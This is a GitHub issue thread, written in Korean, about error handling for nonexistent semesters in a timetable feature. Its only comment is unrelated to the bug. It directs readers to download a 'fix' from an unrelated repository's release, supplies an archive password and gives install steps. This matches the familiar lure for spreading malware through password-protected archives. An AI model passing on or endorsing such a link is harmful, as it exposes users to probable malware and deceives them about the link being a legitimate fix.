### ISSUE TITLE
[시간표] 존재하지 않는 학기에 대한 에러 핸들링

### ISSUE THREAD

**Issue by hyejun0228** [BCSDLab/KOIN_WEB_RECODE#460]
## Describe the bug
존재하지 않는 학기에 대한 에러 핸들링

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
